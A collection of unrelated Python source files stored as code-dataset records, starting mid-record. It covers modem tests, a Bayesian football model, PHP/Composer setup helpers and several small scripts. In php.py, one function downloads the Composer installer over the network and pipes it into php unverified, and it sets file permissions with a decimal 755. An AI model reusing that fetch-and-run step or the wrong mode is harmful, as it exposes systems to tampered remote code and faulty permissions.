AccessProfileFile\nfrom d7a.system_files.dll_config import DllConfigFile\nfrom d7a.system_files.engineering_mode import EngineeringModeFile\nfrom d7a.types.ct import CT\nfrom modem.modem import Modem\nfrom datetime import datetime\nfrom time import sleep\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--serial-test-device\", dest=\"serial_test_device\", help=\"serial port for Test Device\", default=None)\n parser.addoption(\"--serial-dut\", dest=\"serial_dut\", help=\"serial port for Device Under Test\", default=None)\n parser.addoption(\"--loop\", dest=\"loop\", help=\"loop count\", default=1, type=int)\n\n@pytest.fixture(scope=\"session\")\ndef serial_test_device(request):\n dev = request.config.getoption(\"--serial-test-device\")\n if dev is None:\n raise Exception(\"A serial port for the test device is required\")\n\n return dev\n\n@pytest.fixture(scope=\"session\")\ndef serial_dut(request):\n dev = request.config.getoption(\"--serial-dut\")\n if dev is None:\n raise Exception(\"A serial port for the DUT is required\")\n\n return dev\n\n@pytest.fixture(scope=\"session\")\ndef loop_count(request):\n return request.config.getoption(\"--loop\")\n\n@pytest.fixture(scope=\"session\")\ndef test_device(serial_test_device):\n modem = Modem(serial_test_device, 115200, None)\n modem.connect()\n return modem\n\n@pytest.fixture(scope=\"session\")\ndef dut(serial_dut):\n modem = Modem(serial_dut, 115200, None)\n modem.connect()\n return modem\n\n@pytest.fixture(scope=\"session\")\ndef default_channel_header():\n return ChannelHeader(channel_band=ChannelBand.BAND_868,\n channel_coding=ChannelCoding.FEC_PN9,\n channel_class=ChannelClass.LO_RATE)\n\n@pytest.fixture(scope=\"session\")\ndef default_channel_index():\n return 32\n\n@pytest.fixture\ndef context():\n class Context(object):\n pass\n\n return Context()\n\n@pytest.fixture(autouse=True)\ndef reset_before_check_after(test_device, dut):\n reset_board(test_device)\n reset_board(dut)\n\n yield\n\n assert len(dut.get_rebooted_received()) == 0, \"dut device got rebooted\"\n assert len(test_device.get_rebooted_received()) == 0, \"test device got rebooted\"\n\ndef reset_board(modem):\n modem.clear_rebooted_received()\n file = EngineeringModeFile()\n resp = modem.execute_command(\n alp_command=Command.create_with_write_file_action(\n file_id=5,\n data=list(file)\n )\n )\n assert resp, \"Reset board failed!\"\n wait_for_rebooted_response(modem)\n modem.clear_rebooted_received()\n\n\ndef create_access_profile(channel_header, channel_index, enable_channel_scan, scan_automation_period=CT.compress(0)):\n # create a simple access profile, assuming only one subprofile and one subband for now. By setting enable_channel_scan we are listening continuously on\n # the channel_index\n if enable_channel_scan:\n subband_bitmap = 0x01\n else:\n subband_bitmap = 0\n\n return AccessProfile(\n channel_header=channel_header,\n sub_profiles=[SubProfile(subband_bitmap=subband_bitmap, scan_automation_period=scan_automation_period), SubProfile(), SubProfile(),\n SubProfile()],\n sub_bands=[SubBand(\n channel_index_start=channel_index,\n channel_index_end=channel_index,\n eirp=0,\n cca=86\n )] * 8\n )\n\n\ndef change_access_profile(modem, access_profile, specifier=0):\n resp = modem.execute_command(Command.create_with_write_file_action_system_file(\n file=AccessProfileFile(access_profile=access_profile, access_specifier=specifier)),\n timeout_seconds=200\n )\n assert resp, \"Setting Access Profile failed!\"\n\ndef set_active_access_class(modem, access_class):\n resp = modem.execute_command(Command.create_with_write_file_action_system_file(DllConfigFile(active_access_class=access_class, nf_ctrl=0x22)))\n assert resp, \"Setting active access class failed!\"\n\ndef wait_for_unsolicited_response(modem):\n start_time = datetime.now()\n timeout = False\n while len(modem.get_unsolicited_responses_received()) == 0 and not timeout:\n if (datetime.now() - start_time).total_seconds() >= 60:\n timeout = True\n else:\n sleep(0.05)\n\n if timeout:\n assert False, \"Timed out waiting for unsolicited response\"\n\ndef wait_for_rebooted_response(modem):\n start_time = datetime.now()\n timeout = False\n while len(modem.get_rebooted_received()) == 0 and not timeout:\n if (datetime.now() - start_time).total_seconds() >= 60:\n timeout = True\n else:\n sleep(0.05)\n\n if timeout:\n assert False, \"Timed out waiting for rebooted\"\n","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"501615273","text":"import os, re\nfrom fenx.tools import setup_log\nimport logging as _logging\nlogger = _logging.getLogger(__name__)\n\n\ndef parse_env(path):\n \"\"\"\n Parse env file\n Example\n KEY=value\n :param path:\n :return:\n \"\"\"\n data = {}\n try:\n lines = [x.strip() for x in open(path).readlines()]\n except Exception as e:\n logger.error('Error parse file: {}'.format(e))\n return {}\n for line in lines:\n line = line.split('#', 1)[0]\n if not line.strip():\n continue\n m = re.search(r\"(\\w+)\\s*=\\s*(.*)$\", line.strip())\n if m:\n key, value = m.groups()\n value = os.path.expandvars(value)\n value = re.sub(r\"\\$ENV_DIR+\", os.path.normpath(os.path.dirname(path)), value)\n data[key] = value\n return data\n\n\ndef expand_war(value):\n value = os.path.expandvars(value)\n\n return value","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175684081","text":"import json\nimport dragonchain_sdk\n\nclient = dragonchain_sdk.Client(dragonchain_id='your_dc_id', auth_key_id='your_auth_id', auth_key='your_auth_key', endpoint='https://your_dc_id.api.dragonchain.com')\n\n\n# Posting NodeJs contract\nprint(json.dumps(client.create_smart_contract(\n transaction_type='contract_name',\n image='image_name',\n cmd='node',\n args=['index.js'],\n execution_order='parallel',\n # registry_credentials=''\n)))\n\n\n# Updating NodeJs contract\n# print(json.dumps(client.update_contract(\n# contract_id='',\n# image='your_contract_image_name',\n# cmd='node', \n# args=['index.js'],\n# execution_order='parallel',\n# auth=''\n# )))\n\n# To post smart contract written in different languages, \n# change the cmd and args values.\n\n# -----------------------\n# Python commands:\n# cmd='python',\n# args=['-m', 'index'],\n\n# -----------------------\n# Posting Go contract:\n# cmd='./main',\n# args=[''],\n\n# ------------------------\n# Posting C/C++ contract:\n# cmd='./main'\n# args=['']\n\n# -----------------------\n# Posting C# contract:\n# cmd='dotnet',\n# args=['root.dll'],\n\n# ------------------------\n# Posting Shell contract:\n# cmd='sh',\n# args=['contract.sh'],\n\n# --------------------------------------------------------\n# Delete a Smart Contract\n# print(client.delete_contract(''))\n","sub_path":"example_main.py","file_name":"example_main.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"480018279","text":"import os\nimport re\nimport urllib2\n\nfrom distutils.spawn import find_executable\n\nfrom arkos.utilities import shell\n\n\ndef install_composer():\n # Installs Composer to the system.\n cwd = os.getcwd()\n os.chdir(\"/root\")\n os.environ[\"COMPOSER_HOME\"] = \"/root\"\n enable_mod(\"phar\")\n open_basedir(\"add\", \"/root\")\n installer = urllib2.urlopen(\"https://getcomposer.org/installer\").read()\n s = shell(\"php\", stdin=installer)\n os.chdir(cwd)\n if s[\"code\"] != 0:\n raise Exception(\"Composer download/config failed. Error: %s\"%str(s[\"stderr\"]))\n os.rename(\"/root/composer.phar\", \"/usr/local/bin/composer\")\n os.chmod(\"/usr/local/bin/composer\", 755)\n open_basedir(\"add\", \"/usr/local/bin\")\n\ndef verify_composer():\n if not find_executable(\"composer\"):\n install_composer()\n if not find_executable(\"composer\"):\n raise Exception(\"Composer was not installed successfully.\")\n\ndef composer_install(path):\n # Install a PHP application bundle via Composer.\n verify_composer()\n cwd = os.getcwd()\n os.chdir(path)\n shell(\"composer self-update\")\n s = shell(\"composer install\")\n os.chdir(cwd)\n if s[\"code\"] != 0:\n raise Exception(\"Composer failed to install this app's bundle. Error: %s\"%str(s[\"stderr\"]))\n\ndef change_setting(name, value, config_file=\"/etc/php/php.ini\"):\n # Change a key value in php.ini\n with open(config_file, \"r\") as f:\n lines = f.readlines()\n with open(config_file, \"w\") as f:\n matched = False\n for line in lines:\n if re.search(re.escape(name) + \"\\s*=\", line):\n line = name+\" = \"+value+\"\\n\"\n matched = True\n f.write(line)\n if not matched:\n f.write(name+\" = \"+value+\"\\n\")\n\ndef enable_mod(*args, **kwargs):\n # Enable a PHP extension in php.ini\n config_file = kwargs.get(\"config_file\", \"/etc/php/php.ini\")\n with open(config_file, \"r\") as f:\n lines = f.readlines()\n with open(config_file, \"w\") as f:\n for line in lines:\n for x in args:\n if \";extension=%s.so\"%x in line:\n line = \"extension=%s.so\\n\"%x\n if \";zend_extension=%s.so\"%x in line:\n line = \"zend_extension=%s.so\\n\"%x\n f.write(line)\n\ndef disable_mod(*mod):\n # Enable a PHP extension in php.ini\n with open(\"/etc/php/php.ini\", \"r\") as f:\n lines = f.readlines()\n with open(\"/etc/php/php.ini\", \"w\") as f:\n for line in lines:\n for x in mod:\n if \"extension=%s.so\"%x in line and not line.startswith(\";\"):\n line = \";extension=%s.so\\n\"%x\n f.write(line)\n\ndef open_basedir(op, path):\n # Add or remove a path to php.ini's open_basedir setting.\n oc = []\n with open(\"/etc/php/php.ini\", \"r\") as f:\n ic = f.readlines()\n if op == \"del\":\n for l in ic:\n if \"open_basedir = \" in l and path in l:\n l = l.replace(\":\"+path, \"\")\n l = l.replace(\":\"+path+\"/\", \"\")\n oc.append(l)\n else:\n oc.append(l)\n else:\n for l in ic:\n if \"open_basedir = \" in l and path not in l:\n l = l.rstrip(\"\\n\") + \":%s\\n\" % path\n if l.startswith(\";open_basedir\"):\n l = l.replace(\";open_basedir\", \"open_basedir\")\n oc.append(l)\n else:\n oc.append(l)\n with open(\"/etc/php/php.ini\", \"w\") as f:\n f.writelines(oc)\n\ndef upload_size(size):\n # Set PHP's max upload and post sizes.\n oc = []\n with open(\"/etc/php/php.ini\", \"r\") as f:\n ic = f.readlines()\n for l in ic:\n if \"upload_max_filesize = \" in l:\n l = \"upload_max_filesize = %sM\" % size\n elif \"post_max_size = \" in l:\n l = \"post_max_size = %sM\" % size\n oc.append(l)\n with open(\"/etc/php/php.ini\", \"w\") as f:\n f.writelines(oc)\n","sub_path":"arkos/languages/php.py","file_name":"php.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"71776311","text":"import pandas as pd\nimport numpy as np\nimport datetime\nimport pymc as pm\nimport pymc.sampling_jax\nimport aesara.tensor as tt\nimport aesara\nfrom WeibullCountModelFunctions.MLE import MLE\nfrom WeibullCountModelFunctions.WeibullPMF import weibullPmf\nfrom WeibullCountModelFunctions.frankCopula import copula\nfrom itertools import combinations\nfrom scipy.stats import norm\nfrom scipy.integrate import quad, dblquad\nfrom math import factorial, exp, sqrt, pi\n\ndef get_model_posteriors(trace, n_teams):\n tracedict = {\"home\":[],\"intercept\":[],\"offense\":[],\"defense\":[]}\n for i in range(n_teams):\n tracedict[\"offense\"].append([])\n tracedict[\"defense\"].append([])\n for key in tracedict:\n for a in trace.posterior[key]:\n if (key == \"offense\" or key == \"defense\"):\n for b in a.data:\n for i in range(len(b)):\n tracedict[key][i].append(b[i])\n else:\n tracedict[key].extend(a.data)\n\n posteriors = {}\n h_μ, h_σ = norm.fit(tracedict['home'])\n posteriors['home'] = [h_μ, h_σ]\n i_μ, i_σ = norm.fit(tracedict['intercept'])\n posteriors['intercept'] = [i_μ, i_σ]\n o_μ = []\n o_σ = []\n d_μ = []\n d_σ = []\n for i in range(n_teams):\n oᵢ_μ, oᵢ_σ = norm.fit(tracedict['offense'][i])\n o_μ.append(oᵢ_μ)\n o_σ.append(oᵢ_σ)\n dᵢ_μ, dᵢ_σ = norm.fit(tracedict['defense'][i])\n d_μ.append(dᵢ_μ)\n d_σ.append(dᵢ_σ)\n posteriors['offense'] = [o_μ, o_σ]\n posteriors['defense'] = [d_μ, d_σ]\n\n return posteriors\n\ndef fatten_priors(prev_posteriors, factor, f_thresh):\n priors = prev_posteriors.copy()\n #priors['home'][1] = np.minimum(priors['home'][1] * factor, f_thresh)\n #priors['intercept'][1] = np.minimum(priors['intercept'][1] * factor, f_thresh)\n priors['offense'][1] = np.minimum(np.array(priors['offense'][1]) * factor, f_thresh)\n priors['defense'][1] = np.minimum(np.array(priors['defense'][1]) * factor, f_thresh)\n\n return priors\n\ndef model_iteration(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ, samples=2000, tune=1000, cores=3):\n with pm.Model():\n # Global model parameters\n h = pm.Normal('home', mu=priors['home'][0], sigma=priors['home'][1])\n i = pm.Normal('intercept', mu=priors['intercept'][0], sigma=priors['intercept'][1])\n\n # Team-specific poisson model parameters\n o_star_init = pm.Normal('o_star_init', mu=priors['offense'][0], sigma=priors['offense'][1], shape=n_teams)\n Δ_o = pm.Normal('Δ_o', mu=0.0, sigma=Δσ, shape=n_teams)\n o_star = pm.Deterministic('o_star', o_star_init + Δ_o)\n o = pm.Deterministic('offense', o_star - tt.mean(o_star))\n\n d_star_init = pm.Normal('d_star_init', mu=priors['defense'][0], sigma=priors['defense'][1], shape=n_teams)\n Δ_d = pm.Normal('Δ_d', mu=0.0, sigma=Δσ, shape=n_teams)\n d_star = pm.Deterministic('d_star', d_star_init + Δ_d)\n d = pm.Deterministic('defense', d_star - tt.mean(d_star))\n\n λₕ = tt.exp(i + h + o[idₕ] - d[idₐ])\n λₐ = tt.exp(i + o[idₐ] - d[idₕ])\n\n # Likelihood of observed data\n sₕ = pm.Poisson('sₕ', mu=λₕ, observed=sₕ_obs)\n sₐ = pm.Poisson('sₐ', mu=λₐ, observed=sₐ_obs)\n\n trace = pm.sampling_jax.sample_numpyro_nuts(\n samples,\n tune=tune,\n chains=3\n )\n\n posteriors = get_model_posteriors(trace, n_teams)\n\n return posteriors\n\ndef model_iteration_xg(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ, samples=2000, tune=1000, cores=3):\n with pm.Model():\n # Global model parameters\n h = pm.Normal('home', mu=priors['home'][0], sigma=priors['home'][1])\n i = pm.Normal('intercept', mu=priors['intercept'][0], sigma=priors['intercept'][1])\n\n # Team-specific poisson model parameters\n o_star_init = pm.Normal('o_star_init', mu=priors['offense'][0], sigma=priors['offense'][1], shape=n_teams)\n Δ_o = pm.Normal('Δ_o', mu=0.0, sigma=Δσ, shape=n_teams)\n o_star = pm.Deterministic('o_star', o_star_init + Δ_o)\n o = pm.Deterministic('offense', o_star - tt.mean(o_star))\n\n d_star_init = pm.Normal('d_star_init', mu=priors['defense'][0], sigma=priors['defense'][1], shape=n_teams)\n Δ_d = pm.Normal('Δ_d', mu=0.0, sigma=Δσ, shape=n_teams)\n d_star = pm.Deterministic('d_star', d_star_init + Δ_d)\n d = pm.Deterministic('defense', d_star - tt.mean(d_star))\n\n λₕ = tt.exp(i + h + o[idₕ] - d[idₐ])\n σₕ = sqrt(priors['home'][1]**2 + priors[\"intercept\"][1]**2 + 0.15)\n λₐ = tt.exp(i + o[idₐ] - d[idₕ])\n σₐ = sqrt(priors[\"intercept\"][1]**2 + 0.15)\n\n\n # Likelihood of observed data\n sₕ = pm.Normal('sₕ', mu=λₕ, sigma=2, observed=sₕ_obs)\n sₐ = pm.Normal('sₐ', mu=λₐ, sigma=2, observed=sₐ_obs)\n\n trace = pm.sampling_jax.sample_numpyro_nuts(\n samples,\n tune=tune,\n chains=3\n )\n\n posteriors = get_model_posteriors(trace, n_teams)\n\n return posteriors\n\ndef model_update(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, f, f_thresh, Δσ, xgUpdate = False):\n priors[\"offense\"][0] = np.array(priors[\"offense\"][0])\n priors[\"offense\"][1] = np.array(priors[\"offense\"][1])\n priors[\"defense\"][1] = np.array(priors[\"defense\"][1])\n priors[\"defense\"][0] = np.array(priors[\"defense\"][0])\n if (xgUpdate == True):\n posteriors = model_iteration_xg(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ)\n else:\n posteriors = model_iteration(idₕ, sₕ_obs, idₐ, sₐ_obs, priors, n_teams, Δσ)\n posteriors = fatten_priors(posteriors, f, f_thresh)\n\n return posteriors\n\ndef bayesian_poisson_pdf(μ, σ, max_y=10):\n def integrand(x, y, σ, μ):\n pois = (np.exp(x)**y)*np.exp(-np.exp(x))/factorial(y)\n norm = np.exp(-0.5*((x-μ)/σ)**2.0)/(σ * sqrt(2.0*pi))\n return pois * norm\n\n lwr = -3.0\n upr = 5.0\n\n y = np.arange(0,max_y)\n p = []\n for yi in y:\n I = quad(integrand, lwr, upr, args=(yi,σ,μ))\n p.append(I[0])\n p.append(1.0 - sum(p))\n\n return p\n\n\ndef single_game_prediction(row, posteriors, teams_to_int, decimals = 5):\n precision = f\".{decimals}f\"\n game_pred = {\"H_proj\":[],\"A_proj\":[],\"p_1\":[0],\"p_X\":[0],\"p_2\":[0],\"p_Open_home_cover\":[0],\"p_Close_home_cover\":[0],\"p_Open_over\":[0],\"p_Close_over\":[0]}\n idₕ = teams_to_int[row[\"Home\"]]\n idₐ = teams_to_int[row[\"Away\"]]\n i_μ = posteriors[\"intercept\"][0]\n i_σ = posteriors[\"intercept\"][1]\n h_μ = posteriors[\"home\"][0]\n h_σ = posteriors[\"home\"][1]\n oₕ_μ = posteriors[\"offense\"][0][idₕ]\n oₕ_σ = posteriors[\"offense\"][1][idₕ]\n oₐ_μ = posteriors[\"offense\"][0][idₐ]\n oₐ_σ = posteriors[\"offense\"][1][idₐ]\n dₕ_μ = posteriors[\"defense\"][0][idₕ]\n dₕ_σ = posteriors[\"defense\"][1][idₕ]\n dₐ_μ = posteriors[\"defense\"][0][idₐ]\n dₐ_σ = posteriors[\"defense\"][1][idₐ]\n # Normal(μ₁,σ₁²) + Normal(μ₂,σ₂²) = Normal(μ₁ + μ₂, σ₁² + σ₂²)\n log_λₕ_μ = i_μ + h_μ + oₕ_μ - dₐ_μ\n game_pred[\"H_proj\"].append(np.exp(log_λₕ_μ))\n log_λₕ_σ = np.sqrt(i_σ ** 2 + h_σ ** 2 + oₕ_σ ** 2 + dₐ_σ ** 2)\n log_λₐ_μ = i_μ + oₐ_μ - dₕ_μ\n game_pred[\"A_proj\"].append(np.exp(log_λₐ_μ))\n log_λₐ_σ = np.sqrt(i_σ ** 2 + oₐ_σ ** 2 + dₕ_σ ** 2)\n home_score_pdf = bayesian_poisson_pdf(log_λₕ_μ, log_λₕ_σ)\n away_score_pdf = bayesian_poisson_pdf(log_λₐ_μ, log_λₐ_σ)\n p_spaces = {\"Open_cover\":0,\"Close_cover\":0,\"Open_over\":0,\"Close_over\":0}\n for sₕ, pₕ in enumerate(home_score_pdf):\n for sₐ, pₐ in enumerate(away_score_pdf):\n p = pₕ * pₐ\n if sₕ > sₐ:\n game_pred[\"p_1\"][0] += p\n elif sₐ > sₕ:\n game_pred[\"p_2\"][0] += p\n else:\n game_pred[\"p_X\"][0] += p\n\n for x in [\"Open\",\"Close\"]:\n if (\".5\" in str(row[x + \" AH\"])):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + row[x + \" AH\"]):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n elif (\".75\" not in str(row[x + \" AH\"]) and \".25\" not in str(row[x + \" AH\"])):\n if (sₕ != sₐ + row[x + \" AH\"]):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + row[x + \" AH\"]):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n else:\n parts = [row[x + \" AH\"] - 0.25,row[x + \" AH\"] + 0.25]\n for part in parts:\n if (\".5\" in str(part)):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + part):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n else:\n if (sₕ != sₐ + part):\n p_spaces[x + \"_cover\"] += p\n if (sₕ > sₐ + part):\n game_pred[\"p_\" + x + \"_home_cover\"][0] += p\n\n if (\".5\" in str(row[x + \" OU\"])):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > row[x + \" OU\"]):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n elif (\".75\" not in str(row[x + \" OU\"]) and \".25\" not in str(row[x + \" OU\"])):\n if (sₕ + sₐ != row[x + \" OU\"]):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > row[x + \" OU\"]):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n else:\n parts = [row[x + \" OU\"] - 0.25,row[x + \" OU\"] + 0.25]\n for part in parts:\n if (\".5\" in str(part)):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > part):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n else:\n if (sₕ + sₐ != part):\n p_spaces[x + \"_over\"] += p\n if (sₕ + sₐ > part):\n game_pred[\"p_\" + x + \"_over\"][0] += p\n for x in [\"Open\",\"Close\"]:\n game_pred[\"p_\" + x + \"_home_cover\"][0] = game_pred[\"p_\" + x + \"_home_cover\"][0] / p_spaces[x + \"_cover\"]\n game_pred[\"p_\" + x + \"_over\"][0] = game_pred[\"p_\" + x + \"_over\"][0] / p_spaces[x + \"_over\"]\n return game_pred\n","sub_path":"bayesianModelFcns.py","file_name":"bayesianModelFcns.py","file_ext":"py","file_size_in_byte":10781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"402853581","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n# CODE NAME HERE\n\n# CODE DESCRIPTION HERE\n\nCreated on 2019-08-16 at 09:23\n\n@author: cook\n\"\"\"\nimport sys\nimport os\nimport platform\nimport psutil\nimport getpass\nimport socket\n\n# =============================================================================\n# Define functions\n# =============================================================================\ndef main():\n keys = dict()\n keys['MAJOR'] = sys.version_info.major\n keys['MINOR'] = sys.version_info.minor\n keys['MICRO'] = sys.version_info.micro\n # get python path\n if 'PYTHONPATH' in os.environ:\n pythonpath = os.environ['PYTHONPATH']\n keys['PYTHONPATH'] = '\\t\\t' + '\\n\\t\\t'.join(pythonpath.split(os.pathsep))\n else:\n keys['PYTHONPATH'] = 'None'\n # get path\n if 'PATH' in os.environ:\n path = os.environ['PATH']\n keys['PATH'] = '\\t\\t' + '\\n\\t\\t'.join(path.split(os.pathsep))\n else:\n keys['PATH'] = 'None'\n # get DRS_UCONFIG\n if 'DRS_UCONFIG' in os.environ:\n keys['DRS_UCONFIG'] = os.environ['DRS_UCONFIG']\n else:\n keys['DRS_UCONFIG'] = 'None'\n # get modules\n try:\n import astropy\n keys['ASTROPY'] = astropy.__version__\n except:\n keys['ASTROPY'] = 'NOT FOUND'\n try:\n import barycorrpy\n keys['BARYCORRPY'] = barycorrpy.__version__\n except:\n keys['BARYCORRPY'] = 'NOT FOUND'\n try:\n import bottleneck\n keys['BOTTLENECK'] = bottleneck.__version__\n except:\n keys['BOTTLENECK'] = 'NOT FOUND'\n try:\n import numpy\n keys['NUMPY'] = numpy.__version__\n except:\n keys['NUMPY'] = 'NOT FOUND'\n try:\n import numba\n keys['NUMBA'] = numba.__version__\n except:\n keys['NUMBA'] = 'NOT FOUND'\n try:\n import matplotlib\n keys['MATPLOTLIB'] = matplotlib.__version__\n except:\n keys['MATPLOTLIB'] = 'NOT FOUND'\n try:\n import scipy\n keys['SCIPY'] = scipy.__version__\n except:\n keys['SCIPY'] = 'NOT FOUND'\n # apero setup\n try:\n import apero\n from apero.core import drs_startup as drs\n from apero.core import constants\n instruments = drs.Constants['DRS_INSTRUMENTS']\n\n keys['APERO_VERSION'] = drs.__version__\n\n variables = ''\n variables += '\\nAPERO DATE: {0}'.format(drs.__date__)\n variables += '\\nAPERO PATH: {0}'.format(apero.__path__[0])\n variables += '\\n'\n variables += '\\nINSTALLED INSTRUMENTS: ' + ', '.join(instruments)\n\n for instrument in instruments:\n\n params = constants.load(instrument)\n # add variables\n variables += '\\n\\n' + '=' * 50\n variables += '\\n\\t' + instrument\n variables += '\\n' + '='* 50 + '\\n'\n variables += '\\nDRS_ROOT: ' + params['DRS_ROOT']\n variables += '\\nDRS_DATA_RAW: ' + params['DRS_DATA_RAW']\n variables += '\\nDRS_DATA_REDUC: ' + params['DRS_DATA_REDUC']\n variables += '\\nDRS_CALIB_DB: ' + params['DRS_CALIB_DB']\n variables += '\\nDRS_TELLU_DB: ' + params['DRS_TELLU_DB']\n variables += '\\nDRS_DATA_MSG: ' + params['DRS_DATA_MSG']\n variables += '\\nDRS_DATA_WORKING: ' + params['DRS_DATA_WORKING']\n variables += '\\nDRS_DATA_RUN: ' + params['DRS_DATA_RUN']\n\n keys['APERO_VARIABLES'] = variables\n\n\n except:\n keys['APERO_VERSION'] = 'NOT FOUND'\n keys['APERO_VARIABLES'] = ''\n\n # computer information\n keys['COMPUTER_RELEASE'] = platform.release()\n keys['COMPUTER_ARCHITECTURE'] = platform.machine()\n keys['COMPUTER_VERSION'] = platform.machine()\n keys['COMPUTER_SYSTEM'] = platform.system()\n keys['COMPUTER_PROCESSOR'] = platform.processor()\n totalmem = psutil.virtual_memory().total\n keys['COMPUTER_RAM'] = str(round(totalmem / (1024.0 ** 3))) + \" GB\"\n keys['USER'] = getpass.getuser()\n keys['HOST'] = socket.gethostname()\n keys['HOME'] = os.path.expanduser(\"~\")\n\n print_string = \"\"\"\n \n================================================================================\nAPERO\n================================================================================\n\nDRS_UCONFIG = {DRS_UCONFIG}\n\nAPERO: {APERO_VERSION}\n\n{APERO_VARIABLES}\n\n================================================================================\nPYTHON\n================================================================================\n\nPYTHON VERSION = {MAJOR}.{MINOR}.{MICRO}\n\nPYTHON PATH:\n{PYTHONPATH}\n\nASTROPY: {ASTROPY}\nBARYCORRPY: {BARYCORRPY}\nBOTTLENECK: {BOTTLENECK}\nNUMPY: {NUMPY}\nNUMBA: {NUMBA}\nMATPLOTLIB: {MATPLOTLIB}\nSCIPY: {SCIPY}\n\n\n================================================================================\nCOMPUTER\n================================================================================\nSYSTEM = {COMPUTER_SYSTEM}\nRELEASE = {COMPUTER_RELEASE}\nVERSION = {COMPUTER_VERSION}\nARCHITECTURE = {COMPUTER_ARCHITECTURE}\nPROCESSOR = {COMPUTER_PROCESSOR}\nRAM = {COMPUTER_RAM}\nUSER = {USER}\nHOST = {HOST}\nHOME = {HOME}\n\nPATH:\n{PATH}\n \n \"\"\"\n\n print(print_string.format(**keys))\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # run main with no arguments\n main()\n\n# =============================================================================\n# End of code\n# =============================================================================\n","sub_path":"general/shell_vs_call/shell_vs_call.py","file_name":"shell_vs_call.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83464681","text":"#coding=utf-8\n# 模型的加载及使用\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nimport pandas as pd\n\ntokenizer = Tokenizer(num_words=200, filters='!\"#$%&()*+,-./:;<=>?@[\\]^_`{|}~', lower=True) #Tokenizer是一个用于向量化文本,或将文本转换为序列(即单词在字典中的下标构成的列表,从1算起)的类。\ntext = input(\"请输入要预测的数据:\")\nprint(\"正在加载模型...\")\nload_model = load_model(\"/home/sun/文档/地铁项目/LSTM_model.h5\")\nseq = tokenizer.texts_to_sequences(text)\npadded = pad_sequences(seq, maxlen=14)\npred = load_model.predict(padded)\nItemName_id = pred.argmax(axis=1)[0]\nItemName = ItemName_id_df[ItemName_id_df.ItemName_id==ItemName_id]['ItemName'].values[0]\n\nprint(\"\\n正在进行预测该数据: \")\nprint(text)\nprint(\"\\n预测结果是: \")\nprint(ItemName)\n","sub_path":"yinan/UseModel/UseModel.py","file_name":"UseModel.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83175336","text":"from collections import defaultdict\n\ndef annograms(word):\n words = [w.rstrip() for w in open('WORD.LST')]\n\n list_of_annograms = []\n count_char_input = defaultdict(lambda : 0)\n count_char_aux = defaultdict(lambda : 0)\n\n # count the character in the imput word\n for character in word:\n count_char_input[character] += 1\n\n # count the character in each word of the list\n for word in words:\n for character in word:\n count_char_aux[character] += 1\n # add if it is an anagram\n if count_char_input == count_char_aux:\n list_of_annograms.append(word)\n # reset of the dictionary\n count_char_aux = defaultdict(lambda : 0)\n\n return list_of_annograms\n\nif __name__ == \"__main__\":\n print(annograms(\"train\"))\n print('--')\n print(annograms('drive'))\n print('--')\n print(annograms('python'))\n","sub_path":"annograms.py","file_name":"annograms.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64273441","text":"\"\"\"Load AlexNet model and return it.\n\nReturns:\n Module: Torch Module of AlexNet.\n\"\"\"\nfrom torchvision.models import alexnet\n\nfrom models.base_model import Model\n\n\nclass AlexNet(Model):\n \"\"\"Loads AlexNet model.\n \"\"\"\n def __init__(self) -> None:\n \"\"\"Initialize AlexNet model.\n \"\"\"\n # setup\n super().__init__(model=alexnet(pretrained=True))\n\n\nif __name__ == \"__main__\":\n alex = AlexNet()\n print(alex.print_summary())\n","sub_path":"models/alexnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136253339","text":"import numpy as np\nimport heapq\nglobal num_course\nglobal num_train_job\n\nnum_course = 1951\nnum_train_job = 566\n\nbert_pretrain_job_npy_path = '/Users/jeremyhao/Desktop/revise_paper/bert_pretrain/bert_pretrain_job.npy'\nbert_pretrain_course_npy_path = '/Users/jeremyhao/Desktop/revise_paper/bert_pretrain/bert_pretrain_course.npy'\n\ndef cos_sim(c, j):\n '''\n calculate the cosine similarity between two vecotrs\n '''\n vector_a = np.mat(c)\n vector_b = np.mat(j)\n\n num = float(vector_a * 